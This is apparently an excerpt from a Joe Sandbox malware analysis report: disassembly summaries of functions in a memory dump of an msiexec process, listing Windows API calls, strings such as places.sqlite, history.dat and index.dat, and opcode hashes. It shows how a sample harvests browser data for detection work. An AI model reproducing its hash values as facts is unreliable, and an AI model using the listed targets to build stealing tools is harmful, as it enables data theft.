                                                                                • API String ID: 2221118986-1725073988
                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                APIs
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$memcmp
                                                                                • String ID: $$8
                                                                                • API String ID: 2808797137-435121686
                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                APIs
                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                • String ID:
                                                                                • API String ID: 1979745280-0
                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                APIs
                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                • memset.MSVCRT ref: 00414C87
                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProcVersionmemsetwcscpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 4182280571-2036018995
                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                APIs
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                • memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                • String ID: history.dat$places.sqlite
                                                                                • API String ID: 2641622041-467022611
                                                                                • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                APIs
                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 839530781-0
                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: *.*$index.dat
                                                                                • API String ID: 1974802433-2863569691
                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                • String ID:
                                                                                • API String ID: 1125800050-0
                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleSleep
                                                                                • String ID: }A
                                                                                • API String ID: 252777609-2138825249
                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                APIs
                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                • free.MSVCRT ref: 00409A31
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: freemallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3056473165-0
                                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: d
                                                                                • API String ID: 0-2564639436
                                                                                • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: BINARY
                                                                                • API String ID: 2221118986-907554435
                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /stext
                                                                                • API String ID: 2081463915-3817206916
                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 2445788494-0
                                                                                • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3150196962-0
                                                                                • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                APIs
                                                                                Strings
                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                • API String ID: 2803490479-1168259600
                                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041BDDF
                                                                                • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpmemset
                                                                                • String ID:
                                                                                • API String ID: 1065087418-0
                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                APIs
                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                • String ID:
                                                                                • API String ID: 1381354015-0
                                                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                APIs
                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                • String ID:
                                                                                • API String ID: 2154303073-0
                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
